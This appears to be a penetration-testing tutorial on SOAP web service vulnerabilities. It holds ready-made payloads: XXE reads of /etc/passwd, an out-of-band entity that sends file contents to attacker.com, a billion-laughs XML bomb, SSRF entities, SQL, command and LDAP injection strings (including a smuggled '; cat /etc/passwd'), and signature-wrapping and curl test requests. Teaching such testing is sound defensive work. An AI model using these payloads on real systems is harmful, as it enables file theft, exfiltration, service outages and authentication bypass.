SOAP vulnerabilities

Understanding SOAP Vulnerabilities

What are SOAP Vulnerabilities?

SOAP (Simple Object Access Protocol) vulnerabilities exploit security weaknesses in XML-based web services that use SOAP for communication. Despite being considered "legacy," SOAP services are still widely used in enterprise environments, banking systems, and government applications. SOAP's reliance on XML processing creates unique attack vectors including XML External Entity (XXE) injection, XML bombs, WSDL enumeration, and authentication bypass that don't exist in modern REST or GraphQL APIs.

Vulnerable Scenario Example

Normal SOAP request:

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getUserInfo xmlns="http://example.com/userservice">
      <userId>123</userId>
    </getUserInfo>
  </soap:Body>
</soap:Envelope>

XXE attack payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soap [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getUserInfo xmlns="http://example.com/userservice">
      <userId>&xxe;</userId>
    </getUserInfo>
  </soap:Body>
</soap:Envelope>

Attack Result: The XML parser processes the external entity, potentially exposing sensitive files from the server's filesystem or enabling internal network reconnaissance.

How SOAP Attacks Work

SOAP vulnerabilities primarily exploit XML processing weaknesses and service configuration issues. Since SOAP services rely heavily on XML parsing, schema validation, and WSDL documentation, attackers can manipulate XML structure, inject malicious entities, or exploit exposed service definitions to compromise applications.

SOAP Attack Flow

1. Service Discovery - Find SOAP endpoints and WSDL documents

2. WSDL Analysis - Extract service methods, parameters, and data types

3. XML Injection Testing - Test for XXE, XML bombs, and parsing vulnerabilities

4. Authentication Testing - Test SOAP-specific authentication mechanisms

5. Business Logic Abuse - Exploit exposed methods and parameter manipulation

6. Message Structure Manipulation - Bypass validation through XML structure changes

Impact and Consequences

• File System Access - XXE attacks reading sensitive server files

• Internal Network Reconnaissance - SSRF via XML external entities

• Denial of Service - XML bomb attacks consuming server resources

• Authentication Bypass - Exploiting SOAP authentication mechanisms

• Data Manipulation - Unauthorized access to business methods

• Information Disclosure - WSDL exposure revealing internal architecture

• Injection Attacks - SQL, command, and LDAP injection through SOAP parameters

Core SOAP Vulnerabilities

XML External Entity (XXE) Injection

SOAP services are particularly vulnerable to XXE attacks due to their reliance on XML parsing.

File System Access:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soap [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <processData>
      <data>&xxe;</data>
    </processData>
  </soap:Body>
</soap:Envelope>

Internal Network Access (SSRF):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soap [
  <!ENTITY ssrf SYSTEM "http://internal-server:8080/admin">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getData>
      <input>&ssrf;</input>
    </getData>
  </soap:Body>
</soap:Envelope>

Out-of-Band Data Exfiltration:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soap [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % oob "<!ENTITY exfil SYSTEM 'http://attacker.com/steal?data=%file;'>">
  %oob;
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <processRequest>
      <data>&exfil;</data>
    </processRequest>
  </soap:Body>
</soap:Envelope>

XML Bomb Attacks (Billion Laughs)

XML bomb attacks exploit XML entity expansion to consume server resources.

Basic XML Bomb:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soap [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <processData>
      <payload>&lol5;</payload>
    </processData>
  </soap:Body>
</soap:Envelope>

Quadratic Blowup Attack:

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <data>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...</data>
  </soap:Body>
</soap:Envelope>
<!-- Repeat 'A' character millions of times -->

WSDL Enumeration and Information Disclosure

WSDL documents often expose sensitive information about service structure and internal operations.

WSDL Discovery:

# Common WSDL endpoints
curl http://target.com/service?wsdl
curl http://target.com/webservice.asmx?WSDL
curl http://target.com/soap/service?wsdl
curl http://target.com/ws/ServiceName?wsdl

Information Extraction from WSDL:

• Service methods and operations

• Parameter names and data types

• Internal server paths and namespaces

• Authentication requirements

• Error handling mechanisms

SOAP Injection Attacks

SOAP parameters can be vulnerable to various injection attacks.

SQL Injection via SOAP:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getUserData>
      <userId>1' OR '1'='1' --</userId>
    </getUserData>
  </soap:Body>
</soap:Envelope>

Command Injection:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <processFile>
      <filename>document.pdf; cat /etc/passwd</filename>
    </processFile>
  </soap:Body>
</soap:Envelope>

LDAP Injection:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <authenticateUser>
      <username>*)(uid=*))(|(uid=*</username>
      <password>anything</password>
    </authenticateUser>
  </soap:Body>
</soap:Envelope>

SOAP Testing Methodology

Service Discovery and Reconnaissance

WSDL Discovery with Burp Suite:

1. Configure Burp proxy
2. Browse to target application
3. Look for SOAP endpoints in HTTP history
4. Test common WSDL paths:
   - /?wsdl
   - /service?wsdl
   - /webservice.asmx?WSDL
   - /soap?wsdl
5. Analyze WSDL content in Burp

Using SoapUI for Service Discovery:

1. Install SoapUI (free version available)
2. Create new SOAP project
3. Enter WSDL URL: http://target.com/service?wsdl
4. SoapUI automatically generates test requests
5. Analyze available operations and parameters
6. Use generated requests as base for security testing

Manual WSDL Analysis:

# Download and analyze WSDL
curl -s http://target.com/service?wsdl > service.wsdl

# Extract key information
grep -i "operation\|portType\|binding" service.wsdl
grep -i "targetNamespace" service.wsdl
grep -i "location" service.wsdl

XXE Vulnerability Testing

Testing with Burp Suite:

1. Capture SOAP request in Burp Proxy
2. Send to Repeater
3. Add DOCTYPE with external entity:
   <!DOCTYPE soap [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
4. Replace parameter value with &xxe;
5. Send request and analyze response
6. Look for file contents or error messages

Testing with Postman:

1. Create new POST request to SOAP endpoint
2. Set Content-Type: text/xml
3. Body (raw XML):
<?xml version="1.0"?>
<!DOCTYPE soap [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <testMethod>
      <param>&test;</param>
    </testMethod>
  </soap:Body>
</soap:Envelope>
4. Send and analyze response

Using OWASP ZAP:

1. Configure ZAP proxy
2. Spider the application to discover SOAP endpoints
3. Use Active Scanner with XXE payloads
4. Review alerts for XXE vulnerabilities
5. Manual verification of findings

Authentication and Authorization Testing

WS-Security Testing:

<!-- Test missing security header -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <adminOperation>
      <action>deleteUser</action>
    </adminOperation>
  </soap:Body>
</soap:Envelope>

<!-- Test with invalid security token -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Header>
    <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
      <wsse:UsernameToken>
        <wsse:Username>admin</wsse:Username>
        <wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">invalid</wsse:Password>
      </wsse:UsernameToken>
    </wsse:Security>
  </soap:Header>
  <soap:Body>
    <adminOperation>
      <action>listUsers</action>
    </adminOperation>
  </soap:Body>
</soap:Envelope>

HTTP Authentication Testing:

# Test without credentials
curl -X POST http://target.com/soap \
  -H "Content-Type: text/xml" \
  -d @soap_request.xml

# Test with weak credentials
curl -X POST http://target.com/soap \
  -H "Content-Type: text/xml" \
  -H "Authorization: Basic YWRtaW46YWRtaW4=" \
  -d @soap_request.xml

Parameter Manipulation and Injection Testing

SQL Injection Testing with SoapUI:

1. Load WSDL in SoapUI
2. Generate test request for target operation
3. Modify parameter values with SQL injection payloads:
   - ' OR '1'='1' --
   - '; DROP TABLE users; --
   - ' UNION SELECT password FROM admin --
4. Execute request and analyze response
5. Look for SQL errors or unexpected data

Using Burp Intruder for Parameter Fuzzing:

1. Capture SOAP request in Burp
2. Send to Intruder
3. Mark parameter values as payload positions
4. Load injection payloads (SQL, XSS, Command injection)
5. Start attack and analyze responses
6. Look for errors, timeouts, or data disclosure

Advanced SOAP Attack Techniques

SOAP Message Structure Manipulation

SOAP Header Injection:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Header>
    <!-- Inject malicious headers -->
    <Authentication>
      <username>admin</username>
      <password>admin</password>
    </Authentication>
    <Authorization>admin</Authorization>
  </soap:Header>
  <soap:Body>
    <restrictedOperation>
      <action>sensitiveAction</action>
    </restrictedOperation>
  </soap:Body>
</soap:Envelope>

Namespace Confusion:

<!-- Original namespace -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" 
               xmlns:tns="http://service.example.com/">
  <soap:Body>
    <tns:operation>
      <tns:param>value</tns:param>
    </tns:operation>
  </soap:Body>
</soap:Envelope>

<!-- Modified namespace to bypass validation -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" 
               xmlns:tns="http://malicious.attacker.com/">
  <soap:Body>
    <tns:operation>
      <tns:param>malicious_value</tns:param>
    </tns:operation>
  </soap:Body>
</soap:Envelope>

WS-Security Bypass Techniques

Signature Wrapping Attack:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Header>
    <wsse:Security>
      <!-- Original signed element -->
      <saml:Assertion ID="original">
        <saml:Subject>legitimate_user</saml:Subject>
      </saml:Assertion>
      <!-- Digital signature for original element -->
      <ds:Signature>
        <ds:Reference URI="#original"/>
      </ds:Signature>
    </wsse:Security>
  </soap:Header>
  <soap:Body>
    <!-- Inject unsigned element with same ID -->
    <saml:Assertion ID="original">
      <saml:Subject>admin_user</saml:Subject>
    </saml:Assertion>
    <operation>sensitive_action</operation>
  </soap:Body>
</soap:Envelope>

SOAP Fault Injection

Error Message Exploitation:

<!-- Trigger detailed error messages -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <invalidOperation>
      <param1>invalid_type</param1>
      <param2>../../../etc/passwd</param2>
    </invalidOperation>
  </soap:Body>
</soap:Envelope>

SOAP Security Testing Tools

Specialized SOAP Testing Tools

SoapUI (Free and Pro versions):

• WSDL import and analysis

• Automated test case generation

• Security test capabilities

• Load testing features

• Mock service creation

Postman SOAP Testing:

1. Create new request collection for SOAP testing
2. Set up environment variables for endpoints
3. Create test templates for common SOAP operations
4. Use pre-request scripts for dynamic content
5. Implement test scripts for response validation

WSDigger (Burp Suite Extension):

1. Install WSDigger extension in Burp Suite
2. Configure for SOAP endpoint testing
3. Automatically test for common SOAP vulnerabilities
4. Generate payloads for XXE, injection attacks
5. Analyze results and generate reports

Manual Testing with Common Tools

Burp Suite Configuration for SOAP:

1. Configure proxy settings
2. Install additional SOAP extensions:
   - WSDigger
   - Additional Scanner Checks
   - WSDL Wizard
3. Set up custom payloads for SOAP parameters
4. Configure content-type detection for XML
5. Enable XML beautification for readability

OWASP ZAP for SOAP Testing:

1. Configure ZAP proxy
2. Import WSDL file if available
3. Use automated scanner with SOAP-specific rules
4. Review passive and active scan results
5. Manual testing of identified endpoints

curl for Quick SOAP Testing:

# Basic SOAP request
curl -X POST http://target.com/soap \
  -H "Content-Type: text/xml; charset=utf-8" \
  -H "SOAPAction: \"http://service.example.com/operation\"" \
  -d @soap_request.xml

# XXE testing
curl -X POST http://target.com/soap \
  -H "Content-Type: text/xml" \
  -d '<?xml version="1.0"?>
<!DOCTYPE soap [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <test><param>&xxe;</param></test>
  </soap:Body>
</soap:Envelope>'

Business Logic and Parameter Testing

Method Enumeration

Testing Undocumented Methods:

<!-- Try common method names -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <adminLogin>
      <username>admin</username>
      <password>admin</password>
    </adminLogin>
  </soap:Body>
</soap:Envelope>

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <debugInfo>
      <level>full</level>
    </debugInfo>
  </soap:Body>
</soap:Envelope>

Parameter Manipulation

Type Confusion Attacks:

<!-- Send string instead of integer -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getUserById>
      <id>admin</id> <!-- Expected: integer, sent: string -->
    </getUserById>
  </soap:Body>
</soap:Envelope>

<!-- Send array instead of single value -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <updateUser>
      <userId>123</userId>
      <role>user</role>
      <role>admin</role> <!-- Multiple values -->
    </updateUser>
  </soap:Body>
</soap:Envelope>